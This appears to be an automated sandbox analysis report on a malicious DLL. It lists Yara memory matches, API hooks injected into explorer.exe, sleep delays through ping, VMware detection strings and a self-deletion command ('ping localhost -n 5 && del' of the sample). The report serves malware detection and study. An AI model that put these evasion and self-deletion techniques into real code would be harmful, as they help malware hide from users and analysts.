Source: Yara match	File source: 00000038.00000003.742635161.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.388156099.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.387614709.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.433046999.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.388142124.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.438809080.000000000542C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000002.888570101.0000024373502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.743129288.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.742454861.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.742926350.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.504617331.000001985CADC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.508411466.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.387950801.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000002.744378617.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.594123395.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.491794343.0000000006378000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.742968366.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2588, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6856, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 6468, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4504, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 3932, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 2880, type: MEMORYSTR
Source: Yara match	File source: 4.3.rundll32.exe.4e394a0.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.4e394a0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.55a94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.55d6940.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.55d6940.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.55a94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.552a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.552a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000028.00000000.604999946.0000028A77740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.507197742.0000000000930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000000.741896221.0000000003610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000000.667078163.000001EF35E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000000.741217358.0000000003610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000000.703035684.0000024373BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.622907247.000002BFD6C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.564167327.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.504046961.0000000000930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.686963959.0000019853F48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.569771687.00000000052AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.436035470.00000000055A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.603233146.0000028A77740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.572421841.0000000005DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.606133763.0000028A77740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.505634538.0000000000930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.619033467.000002BFD6C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000000.740581278.0000000003610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000000.654783377.000001EF35E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.615194902.000002BFD6C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000000.661830136.000001EF35E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000000.698826675.0000024373BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.435816444.000000000552A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000000.695593372.0000024373BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Self deletion via cmd delete

Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\d6YCUW421p.dll
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\d6YCUW421p.dll

Modifies the export address table of user mode modules (user mode EAT hooks)

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFF3FC1521C

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Modifies the import address table of user mode modules (user mode IAT hooks)

Source: explorer.exe

EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFF3FC15200

Source: C:\Windows\SysWOW64\rundll32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6440	Thread sleep time: -10145709240540247s >= -30000s			Jump to behavior
Source: C:\Windows\explorer.exe TID: 6836	Thread sleep time: -1773297476s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5446			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4040			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\g2letrfe\g2letrfe.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vqkyohgm\vqkyohgm.dll			Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\rundll32.exe

4_2_05DD591B

Source: explorer.exe, 0000001D.00000000.540197857.0000000007FBD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001D.00000000.540197857.0000000007FBD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}d
Source: explorer.exe, 0000001D.00000000.586255022.000000000807C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
